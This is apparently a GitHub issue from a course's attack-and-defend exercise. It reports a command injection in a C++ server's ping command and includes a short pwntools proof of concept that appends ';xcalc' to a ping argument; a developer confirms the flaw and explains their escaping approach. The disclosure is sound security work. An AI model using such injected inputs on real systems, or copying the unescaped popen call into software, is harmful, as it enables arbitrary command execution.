Command Injection inside the ping command

[CedMaire]

Where:

grass/src/commands.cpp

Line 71 in a5b8f5a

FILE *pipe = popen(("cd " + usrLocation + " && " + string(cmdRedirection) + " 2>&1").c_str(),

They have an "escape" function they use to escape strings that represent a path, but they do not check against any ";" character that one could potentially use to terminate a command and start a new one. Thus, I exploited the ping command by appending another new command (xcalc) that will be executed right after the ping.

Here is a PoC:

#!/usr/bin/env python
from pwn import *

sh = process(['./client', '127.0.0.1', '1337'])

sh.sendline("ping google.ch;xcalc\n")
print sh.interactive()

[KTiago]

You are correct, there is indeed a vulnerability in the ping command and we certifiy that your exploit works. 🥇

However, let me make some clarifications:

While we have an escape function as you noticed, one of our programmers somehow forgot to call it for the ping command.

Morover, this escape function only escapes quotes in a given string, which is an intended behavior. The idea is to put escaped user-supplied arguments bash commands between quotes to prevent the execution of unintended additional commands. As an example, have a look at the cd command which does not suffer from the same vulnerability:

grass/src/commands.cpp

Line 462 in a5b8f5a

string cmd = "exec bash -c \'mkdir \"" + escape(absPath) + "\"\'";

The above prevents the use of ";" or "&&" or any other tricks to run a command injection.